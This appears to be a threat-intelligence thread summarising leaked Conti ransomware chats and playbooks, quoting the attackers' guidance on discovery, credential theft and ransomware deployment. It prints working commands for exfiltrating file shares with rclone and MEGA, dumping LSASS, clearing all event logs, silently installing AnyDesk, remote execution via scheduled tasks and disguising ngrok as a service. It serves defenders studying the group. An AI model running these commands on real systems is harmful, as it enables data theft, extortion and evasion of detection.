New chat logs from the 26 Feb to the 28 Feb were released. It included an entertaining exchange where the user "pumba" was not happy with their work partner "tramp" (also referred to as “trump”). “Pumba” ends the conversation by asking to be moved to another team. #ContiLeaks

Leaked Bazar Bot panels show hundreds of past infected clients. Entries contain comments that include reconnaissance of revenue, and tracking work to be done. #ContiLeaks

Additional infrastructure has been identified including the source code and configurations of many of their sites. Iptable rules and nginx configuration leak more IP addresses! Files contain Postgres passwords to their storage #ContiLeaks

Can relate - #ImposeCost or infra problems? #ContiLeaks

Possible Conti v2 locker/decryptor. Folder is password protected. #ContiLeaks

Even threat actors use code control! GitLab Server IP and token. #ContiLeaks

Threat actors potentially talking about a developer who worked on Trickbot and Bazar. #ContiLeaks

Potentially more proof on Trickbot dying off. #ContiLeaks

Threat actors talking about Zerologon on the Trickbot forum. Look familiar? thedfirreport.com/2022/02/21/qbo… thedfirreport.com/2021/11/01/fro… #ContiLeaks

Threat actors talking about Kerberoasting on the Trickbot forum #ContiLeaks

ShareFinder - thedfirreport.com/?s=sharefinder #ContiLeaks

AdFind - thedfirreport.com/?s=adfind #ContiLeaks

Decrypting Veeam secrets - we saw this in our Diavol case - thedfirreport.com/2021/12/13/dia… #ContiLeaks

Discussing SonicWall SSL-VPN as initial access #ContiLeaks

"Fast Guide" - net, dclist, nltest, adfind, kerberoast, seatbelt, net-gpppassword, sharefinder, etc. #ContiLeaks

"I recommend using all the utilities attached in the c# topic by collecting them from the sources on the github.
" #ContiLeaks

"SMB Auto Brute Force" - Invoke-SMBAutoBrute.ps1

"We've ripped off two domain admins." #ContiLeaks

"Tor backdoor" #ContiLeaks

FileZilla discussion

"On networks where there are no DLP systems, you can simply download Filezilla portable and download all cartoons without ads!11
But you only need to use the SFTP protocol, that is, through port 22, not through 21" #ContiLeaks

Disabling Defender using GPO

"If you have only a defender in your network, then it is extinguished using the link above. It's right there in the pictures. Easier nowhere. Went to DC, created a policy
" #ContiLeaks

"Hyper V"

"it’s easier than with the sphere and proxmox, we fly into the virtuoso management manager, look in it where are the cars (Shares, AD) and compare with the list that was removed, if the entire infrastructure is on virtual machines, then just turn off..." #ContiLeaks

Disabling notifications on Synology servers before ransom #ContiLeaks

"Change RDP port" #ContiLeaks

"NTDS Dumping"

We reported on this technique multiple times - thedfirreport.com/?s=ac+i+ntds #ContiLeaks

Another method to steal a copy of ntds.dit using shadow copy, wmic, 7zip, and esentutl. #ContiLeaks

Don't know what to do on your next op? Just ask your team leader! #ContiLeaks

"Hunt Administrator"

"Of course, we are interested in seniors because they have more privileges/accesses (read passwords)."

net group "domain admins" /domain
AdFind

#ContiLeaks

"Hunt Administrator Part 2"

"Firstly, how the software works - it asks where the user is at least somehow authorized at the moment. And our user is not simple - he is an administrator and at some point he can be authorized on 20-30-50 servers."

#ContiLeaks

"Hunt Administrator Part 2"

"Also, system administrators FREQUENTLY meet the following folders in AppData\Roaming && AppData\Local:
Keepass
LastPass
their configs are there."

#ContiLeaks

"Hunt Administrator Part 2"

"Why the manual was written - so as not to try headlong to go raise the session and catch alerts from the admin.
Our job is rather to figure out what works, rather than setting up brute force for all kinds of access."

#ContiLeaks

"powerupsql"

powershell-import /home/user/soft/scripts/powerupsql.ps1
runas /netonly /user:domain.local\user powershell_ise

"From vpn it also works through (grabbing skl servers in the domain)"

#ContiLeaks

Threat actors having some issues with Cylance Protect

Difficulty raising session
Mount AnyDesk / Onion backdoor
Anchor DLL not attaching
Dump LSASS does not help (the output is empty)
Palit advanced ip scanner
Deleted via GUI + reboot

#ContiLeaks

"TeamServer setup" #CobaltStrike

C2concealer being used by Conti TAs - Mentioned in a couple of our #CobaltStrike reports thedfirreport.com/2022/01/24/cob… thedfirreport.com/2021/08/29/cob…

#ContiLeaks

"ShadowProtect SPX (StorageCraft)"

"Accessing a server with Shadow Protect SPX backups (StorageCraft)"

#ContiLeaks

"Useful Links and Websites"

#ContiLeaks

"#CobaltStrike Enhancement Chain"

AV_Query - thedfirreport.com/?s=AV_Query

#ContiLeaks

Kerberoasting using compromised VPN creds

#ContiLeaks

"Backup of all MS Exchange mailboxes in one command"

foreach ($mbx in (Get-Mailbox)){New-MailboxExportRequest -mailbox $mbx.alias -FilePath "\\Server\SharedFolder\$($mbx.Alias).pst"}

#ContiLeaks

"Rclone"

shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

"Everyone connects via SSH under their own account, configures the remote (if it is not already configured), creates.."

#ContiLeaks

"Finding and uploading a webshell in Exchange Microsoft"

#ContiLeaks

"Finding and uploading a webshell in Exchange Microsoft"

"The lightest and most durable webshell I use is this"

"For those who have asp webshell removed \ scorched by Aver! you can obfuscate not only the one in the archive, it removes detections.."

#ContiLeaks

"Anydesk"

cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent

"And then we log in with a local admin or a domain account and use the charms of Anydesk
You can also download / upload to / from the victim's machine..."

#ContiLeaks

The #ContiLeaks account recently linked additional source code relating to Trickbot. It includes Erlang code and configuration files from supporting Trickbot infrastructure

"Install metasploit on vps"

#ContiLeaks

"HOW AND WHAT INFO TO DOWNLOAD"

"Next, we study the removed balls, we are interested in
*Finance docks
*Accounting
*Aichi
*Clients
*Projects
And so on, it all depends on what our target is doing"

#ContiLeaks

"RIGHT CLICK ON THE AGENT AND CLICK INTERACT"

Clicky clicky instructions for #CobaltStrike/Discovery

#ContiLeaks

Team descriptions, team leads, scheduling, etc.

#ContiLeaks

"MegaNZ usage"

MEGAclient.exe login supertest@mail.test P@$$w0rd
schtasks /query /FO list | findstr /i "mega"

#ContiLeaks

"IF RDP IN LOCAL IS VERY NEEDED :: HOW NOT TO SLEEP"

"Such simple tricks will help you not to sleep stupidly on the RDP"

"We do not sit on the RDP, after we have finished - we do Logoff (MANDATORY). Not to be confused with simply closing the RDP window. =)"

#ContiLeaks

"Starting a binary on a remote machine via SCHTASKS from Cobalt Strike"

shell SCHTASKS /s remote-hostname123 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\srvvhost.exe" /sc ONCE /sd 01/01/2021 /st 00: 00

#ContiLeaks

So...we are pretty good at what we do?

screenshot credits to:

#ContiLeaks

"megacmd"

shell MEGAclient.exe put -q --ignore-quota-warn \\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /

#ContiLeaks

Executing the locker /w examples and parameters

"All parameters can be combined with each other, the order is not important. If the locker is launched through the command line, then run it as an administrator (If you have rights)."

#ContiLeaks

More Rclone chatter, appears they learned about the tool ~2021-04-07

"rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12"

"here is the guide. everything is simple here"

thedfirreport.com/?s=rclone

#ContiLeaks

#CobaltStrike

"The current version of cobalt is patched with a Java hook where a trial EICAR fingerprint was taken."

"there is an artifact.cna that needs to be imported into cobalt to generate internal native loads and staged loads to run."

#ContiLeaks

"Regulations for submitting a case and working with data"

"In the process of data retrieval and in the process of parsing, we are looking for files containing cyber insurance conditions, standard search tags

Cyber
policy
insurance
endorsement
supplementary..."

#ContiLeaks

TAs exploiting SonicWall SMA

#ContiLeaks

"Dumping Lsass without katz"

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP

cmd.exe > procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

#ContiLeaks

Lots of familiar tools in these dumps/conversations.

TA using Responder

#ContiLeaks

SharpHound/Bloodhound

"shoot the sharphound, throw the shot into the bloodhound - profit"

execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --exc...

#ContiLeaks

"Cleaning out the dens" aka deleting logs

1.CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

2. PowerShell
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

#ContiLeaks

TAs testing WinPwn by @ShitSecure and @GossiTheDog's HiveNightmaware

#ContiLeaks

@ShitSecure @GossiTheDog TAs talking about installing Windows Subsystem for Linux

"we need windows server 2019+"

#ContiLeaks

@ShitSecure @GossiTheDog Few references to SharpChromium so far

"SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:

Cookies
History
Saved Logins"

github.com/djhohnstein/Sh…

#ContiLeaks

Impacket, proxychains, psexec

#ContiLeaks

TAs testing/talking about PetitPotam by @topotam77

"I did this manu, suddenly it will help someone. bussink.net/ad-cs-exploit-…"

"Has anyone smoked this github.com/topotam/PetitP…"

#ContiLeaks

@topotam77 Few conversations about using this #Zerologon exploit github.com/nccgroup/nccfs… by @NCCGroupInfosec:

"it's better to check with SharpZerologon, it's more reliable"

#ContiLeaks

It seems the TAs had a common set of exploits they usually tried including:

eternalblue ms17-010
bluekeep CVE- 2019-0708
smbghost cve-2020-0796

#ContiLeaks

winPEAS by @carlospolopm getting a few call outs.

Also mentions of seatbelt, inveigh by @kevin_robertson and rebeus.

"Run ad_find, seatBelt, ChromeSharp, winpeas, rebeus, Inveit, tried every possible exploit."

#ContiLeaks

Step by step instructions by "tl1"

1. Collect domain and the environment info
2. Collect AD info
3. seatbelt, WinPEAS, GPP, ShareFinder, Kerberoast, asreproast, zerologon
4. Persistence during ShareFinder exec
5. Lateral movement if possible

#ContiLeaks

sqlcmd

"see who is working with the database (hosts and users from where they connected to it)"

shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses"

shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W

#ContiLeaks

A couple mentions of SessionGopher by @arvanaghi

"it turned out that no one listens to me so I say it again to all who have eyes and ears use session gopher domain-width before locking"

h/t to @seadev3 for pointing that out

"NGROK v2 (only official solution)"

Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"

.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config "C:\Windows\tmp\config.yml" --log "false"

#ContiLeaks

"Stops everything that is possible. VERY useful when locking when you need to lock servers nearby that are busy with DBs and other applications."

If you're detecting the below commands, its too late. Try to detect earlier in the attack lifecycle.

#ContiLeaks